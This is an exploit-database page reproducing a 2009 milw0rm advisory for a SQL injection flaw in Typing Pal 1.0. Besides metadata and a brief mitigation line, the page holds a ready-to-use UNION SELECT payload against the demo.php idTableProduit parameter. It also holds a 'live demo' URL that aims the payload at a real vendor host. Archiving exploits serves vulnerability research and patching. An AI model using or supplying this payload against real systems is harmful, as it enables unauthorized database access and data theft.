header-logo
Suggest Exploit
vendor:
Typing Pal
by:
Red-D3v1L
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Typing Pal
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:demarque:typing_pal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Typing Pal <= 1.0 Remote SQL injection Vulnerability

Typing Pal version 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Apply the latest security patches and ensure that all web applications are configured securely.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                        

==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»] Typing Pal <= 1.0 Remote SQL injection Vulnerability
==============================================================================
    [»] my home:            [ Hackteach.org ]
    [»] Script:             [ Typing Pal ]
    [»] Language:           [ PHP ]
    [»] home:               [ http://www.demarque.qc.ca/download_demo/popupDownload.asp?noProduit=63&langue=1 ]
    [»] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:          [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL  ]===  
  
    [»] {PAHT}/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
    [»] l1v3 d3m0 : http://education.demarque.com/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
 

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-07]

Navigation

Suggest Exploit

Services By CQR